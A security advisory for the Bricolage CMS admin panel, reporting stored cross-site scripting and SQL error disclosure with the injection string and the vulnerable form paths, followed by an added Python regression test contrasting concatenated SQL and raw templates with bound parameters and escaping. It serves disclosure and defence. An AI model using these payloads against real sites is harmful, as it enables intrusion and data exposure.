Bricolage version 1.x suffers from persistent cross-site scripting and remote SQL injection vulnerabilities.
-------------------------------------------------------------------------------------------------------------------------------------------------
TITLE: Bricolage CMS Admin panel Multiple stored XSS, SQL error pages
Vendor: Bricolage CMS
Author: r007k17-w a.k.a Raghavendra Karthik.D
Email: n4gb07@gmail.com
My blog: http://shadowrootkit.wordpress.com/
Download Link: http://bricolagecms.org/downloads/
Versions: 1.*.*/2*
Tested on: Windows 7
-----------------------------------------------------------------------------------------------------------------------------------------------------------------
DEMO:
A) Persistent XSS
1. http://localhost/admin/profile/output_channel/
DEMO: http://demo.bricolagecms.org/admin/profile/output_channel/
In the 'Name' and 'Description' fields,
POST DATA= "'-->><script>alert(0)</script>
2. http://localhost/admin/profile/source/
DEMO: http://demo.bricolagecms.org/admin/profile/source/
In the 'Source Name' and 'description' fields,
POST DATA= "'-->><script>alert(0)</script>
B) SQL error pages on reflected XSS/malicious characters (information disclosure)
1. http://localhost/admin/profile/element_type/
DEMO: http://demo.bricolagecms.org/admin/profile/element_type/
In the 'Source Name' and 'description' fields,
POST DATA= "'-->><script>alert(0)</script>
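Added example (not part of the original advisory and not Bricolage code): a Python regression check for the two behaviours reported above, showing that the posted string breaks a concatenated SQL statement and a raw template, and is stored and rendered inertly with bound parameters and output encoding. The table name `channel`, the form markup, the function names and the use of SQLite are assumptions made for illustration.

```python
import html
import sqlite3
from html.parser import HTMLParser

# The string the advisory posts into the Name/Description fields.
PAYLOAD = "\"'-->><script>alert(0)</script>"

class TagCounter(HTMLParser):
    """Collects the element names an HTML parser sees in rendered markup."""
    def __init__(self):
        super().__init__()
        self.tags = []
    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

def parsed_tags(markup):
    counter = TagCounter()
    counter.feed(markup)
    counter.close()
    return counter.tags

def store_naive(db, name):
    # Vulnerable pattern: the value is concatenated into the SQL text.
    db.execute("INSERT INTO channel (name) VALUES ('" + name + "')")

def store_bound(db, name):
    # Placeholder binding: quotes in the value never reach the SQL parser.
    db.execute("INSERT INTO channel (name) VALUES (?)", (name,))

def render(name, escape):
    # Hypothetical edit form: the stored value lands in an attribute and in body text.
    value = html.escape(name, quote=True) if escape else name
    return '<input name="name" value="%s"><p>%s</p>' % (value, value)

def demo():
    db = sqlite3.connect(":memory:")  # assumption: SQLite stands in for the real database
    db.execute("CREATE TABLE channel (name TEXT)")
    sql_error = None
    try:
        store_naive(db, PAYLOAD)
    except sqlite3.Error as exc:
        sql_error = str(exc)  # the text a verbose error page would disclose
    store_bound(db, PAYLOAD)
    stored = db.execute("SELECT name FROM channel").fetchone()[0]
    return sql_error, stored, parsed_tags(render(stored, False)), parsed_tags(render(stored, True))

if __name__ == "__main__":
    print(demo())
```

A check of this shape can run in CI against every admin form field that is echoed back to the browser; the database error text belongs in a server-side log, not in the response.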
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
gr33t1ngs and ShOuTZ to s1d3-3ff3cts ,crusi,s1l3n7 4ss4s1n and my
friends